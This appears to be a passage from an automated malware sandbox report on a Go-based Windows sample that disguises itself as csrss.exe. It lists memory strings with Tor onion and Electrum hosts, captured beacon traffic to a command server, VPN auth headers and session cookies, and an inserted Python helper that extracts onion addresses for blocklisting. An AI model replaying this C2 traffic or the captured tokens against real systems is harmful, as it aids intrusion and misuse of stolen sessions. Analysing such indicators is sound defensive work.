runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
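The memory strings above carry nine Tor onion service names (eight 16-character v2 names and one 56-character v3 name) fused to the surrounding Go runtime strings because the dump has no separators. The helper below is an added example for this report, not Joe Sandbox output and not code from the sample: it carves onion names out of such run-together text, decides whether a candidate is v2 or v3 from the base32 run in front of ".onion", and verifies a v3 candidate against the checksum that Tor's rend-spec-v3 defines (the first two bytes of SHA3-256 over ".onion checksum" || PUBKEY || VERSION, with VERSION = 0x03). SAMPLE_DUMP is constructed from strings quoted on this page; the 32-byte key used to build a reference v3 address is arbitrary.

```python
"""Carve Tor onion service names out of run-together memory strings and
check v3 names against the checksum from Tor's rend-spec-v3.

Added example for this report; not Joe Sandbox code and not code from the
sample. SAMPLE_DUMP is constructed from strings quoted in the report above.
"""
import base64
import hashlib
import re

# Tor names are lowercase RFC 4648 base32 (a-z, 2-7): 16 chars for v2,
# 56 chars for v3. With the dump's separators lost, the base32 run sitting
# in front of ".onion" may be longer than the name, so we take the whole
# run and cut the name off its tail.
_RUN_BEFORE_ONION = re.compile(r"[a-z2-7]{16,}(?=\.onion)")
V3_VERSION = b"\x03"

# Constructed from the strings quoted on this page (separators already lost).
SAMPLE_DUMP = (
    "bad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handler"
    "electrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %w"
    "hpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too large"
    "Fserver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion"
    "http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll"
)


def v3_checksum(pubkey: bytes) -> bytes:
    """CHECKSUM = SHA3-256(".onion checksum" || PUBKEY || VERSION)[:2]."""
    if len(pubkey) != 32:
        raise ValueError("ed25519 public key must be 32 bytes")
    return hashlib.sha3_256(b".onion checksum" + pubkey + V3_VERSION).digest()[:2]


def v3_address(pubkey: bytes) -> str:
    """Build a v3 name: base32(PUBKEY || CHECKSUM || VERSION) + ".onion"."""
    raw = pubkey + v3_checksum(pubkey) + V3_VERSION  # 35 bytes -> 56 chars
    return base64.b32encode(raw).decode().lower() + ".onion"


def is_valid_v3(name: str) -> bool:
    """True if the 56-char label decodes to PUBKEY||CHECKSUM||0x03 with a
    matching checksum. A corrupted or random label fails with p ~ 1/65536."""
    label = name[:-6] if name.endswith(".onion") else name
    if not re.fullmatch(r"[a-z2-7]{56}", label):
        return False
    raw = base64.b32decode(label.upper())
    return raw[34:35] == V3_VERSION and raw[32:34] == v3_checksum(raw[:32])


def extract_onions(blob: str) -> list:
    """Return [{"name", "version", "checksum_ok"}, ...] for each distinct name.

    For every base32 run directly in front of ".onion": a 56-char tail that
    ends in 'd' (the base32 digit holding version byte 3) is a v3 candidate
    and is checksum-verified; otherwise the last 16 chars are reported as a
    v2 name, which carries no checksum and cannot be verified. A v3 candidate
    that fails its checksum (corrupt dump, or a v2 name preceded by 40 other
    base32 chars) is kept with checksum_ok=False and its v2 reading is added.
    """
    seen, results = set(), []

    def add(name, version, checksum_ok):
        if name not in seen:
            seen.add(name)
            results.append({"name": name, "version": version, "checksum_ok": checksum_ok})

    for m in _RUN_BEFORE_ONION.finditer(blob):
        run = m.group(0)
        if len(run) >= 56 and run.endswith("d"):
            candidate = run[-56:] + ".onion"
            ok = is_valid_v3(candidate)
            add(candidate, 3, ok)
            if ok:
                continue
        add(run[-16:] + ".onion", 2, None)
    return results


if __name__ == "__main__":
    for entry in extract_onions(SAMPLE_DUMP):
        print(entry)
```

Two caveats for triage: v2 names cannot be validated (they are a truncated SHA-1 of the service key, with no checksum), and the Tor network stopped serving v2 onion services in 2021, so the eight v2 names here identify the code base and its age but are not live infrastructure; the v3 name is the one worth carrying into the blocklist together with its clearnet twin server5.duniadekho.bar.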
        Source: unknown | DNS query: name: stun.stunprotocol.org
        Source: global traffic | HTTP traffic detected:
            POST /api/poll HTTP/1.1
            Host: server5.duniadekho.bar
            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15
            Content-Length: 752
            Version: 195
            Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected:
            POST /api/poll HTTP/1.1
            Host: server5.duniadekho.bar
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.102 Safari/537.36
            Content-Length: 752
            Version: 195
            Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected:
            POST /v4/register_subscriber HTTP/1.1
            Host: api.sec-tunnel.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232
            Content-Length: 122
            Accept: application/json
            Content-Type: application/x-www-form-urlencoded
            SE-Client-Version: Stable 74.0.3911.232
            SE-Operating-System: Windows
            Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected:
            POST /v4/register_subscriber HTTP/1.1
            Host: api.sec-tunnel.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232
            Content-Length: 122
            Accept: application/json
            Authorization: Digest username="se0316", realm="ApiDigest", nonce="/4Ky2S+EQNGLy90l", uri="/v4/register_subscriber", response="c831806b14e2c3b7004579ec11587612cdb1b3917335891cf7235198c99dc729", algorithm=SHA-256, cnonce="000275160ea60cbdba91b4cc7df429a08789804f2c6a668bf7f545196daed8cb", opaque="KPVLh09NoSzfihFl", qop=auth, nc=00000002
            Content-Type: application/x-www-form-urlencoded
            SE-Client-Version: Stable 74.0.3911.232
            SE-Operating-System: Windows
            Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected:
            POST /v4/register_device HTTP/1.1
            Host: api.sec-tunnel.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232
            Content-Length: 104
            Accept: application/json
            Authorization: Digest username="se0316", realm="ApiDigest", nonce="/4Ky2S+EQNGLy90l", uri="/v4/register_device", response="e52728886ab90acd4e20176061d98c9597dfc0e29f7caa7fe9f79f26f8a6905e", algorithm=SHA-256, cnonce="096351fa04f952336d066a61ea276680eb33abaa2d9cd34e42ccb75380bbebe6", opaque="KPVLh09NoSzfihFl", qop=auth, nc=00000003
            Content-Type: application/x-www-form-urlencoded
            Cookie: session=MTY4NTI2NjQ1OHxOd3dBTkVOWVZETk1WMUpQUjBkWFVsQTNRelkyVWtoWVRUTlJUMUJYTjBwT1JGUlNSMDgyV2pSU1JVZFlNMFZITWs1S1NEWkhWVkU9fO17cEDOazaCKbxTQueC_XgaY796TAY41P_GtC_vwNFl
            SE-Client-Version: Stable 74.0.3911.232
            SE-Operating-System: Windows
            Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected:
            POST /v4/discover HTTP/1.1
            Host: api.sec-tunnel.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232
            Content-Length: 79
            Accept: application/json
            Authorization: Digest username="se0316", realm="ApiDigest", nonce="/4Ky2S+EQNGLy90l", uri="/v4/discover", response="6646ff41f2e352bbf338a01d45b12aa3ad1ca7b27dd967c0cec8bb32f4d3882a", algorithm=SHA-256, cnonce="1aac6b7a1b1d1ba6d73b41ee4a40e57426e70bce1ac85d74449c90bceeb0c432", opaque="KPVLh09NoSzfihFl", qop=auth, nc=00000004
            Content-Type: application/x-www-form-urlencoded
            Cookie: session=MTY4NTI2NjQ1OHxOd3dBTkVOWVZETk1WMUpQUjBkWFVsQTNRelkyVWtoWVRUTlJUMUJYTjBwT1JGUlNSMDgyV2pSU1JVZFlNMFZITWs1S1NEWkhWVkU9fO17cEDOazaCKbxTQueC_XgaY796TAY41P_GtC_vwNFl
            SE-Client-Version: Stable 74.0.3911.232
            SE-Operating-System: Windows
            Accept-Encoding: gzip
        Source: global traffic | TCP traffic: 192.168.11.20:49996 -> 62.210.99.238:39819
        Source: global traffic | TCP traffic: 192.168.11.20:49999 -> 77.68.94.106:9001
        Source: global traffic | UDP traffic: 192.168.11.20:64952 -> 74.125.204.127:19302
        Source: unknown | Network traffic detected: HTTP traffic on port 49997 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 50013 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 50038 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 50009 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 50011 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 50042 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 50007 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 50015 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50010
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50011
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50013
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50038
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50015
        Source: unknown | Network traffic detected: HTTP traffic on port 50001 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49990 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 50005 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49992 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 50043 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 50045 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49998
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49997
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50007
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50006
        Source: unknown | Network traffic detected: HTTP traffic on port 49998 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50009
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50008
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49993
        Source: unknown | Network traffic detected: HTTP traffic on port 50010 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49992
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49991
        Source: unknown | Network traffic detected: HTTP traffic on port 50008 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49990
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50043
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50042
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50001
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50045
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50000
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50044
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50002
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50005
        Source: unknown | Network traffic detected: HTTP traffic on port 50002 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 50000 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 50006 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49991 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 50044 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49993 -> 443
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 28 May 2023 09:32:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.0.25Access-Control-Allow-Credentials: false
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 28 May 2023 09:33:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.0.25Set-Cookie: PHPSESSID=9afcop0lb77374j5hf7sfs0fck; path=/; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Credentials: false
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 147.135.65.26
        Source: unknownTCP traffic detected without corresponding DNS query: 158.69.205.247
        Source: unknownTCP traffic detected without corresponding DNS query: 147.135.65.26
        Source: unknownTCP traffic detected without corresponding DNS query: 158.69.205.247
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 147.135.65.26
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 158.69.205.247
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://invalidlog.txtlookup
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://localhost:3433/https://duniadekho.baridna:
        Source: powershell.exe, 00000035.00000002.209188988689.00000000709CD000.00000020.00000001.01000000.00000010.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000035.00000002.209188988689.00000000709CD000.00000020.00000001.01000000.00000010.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
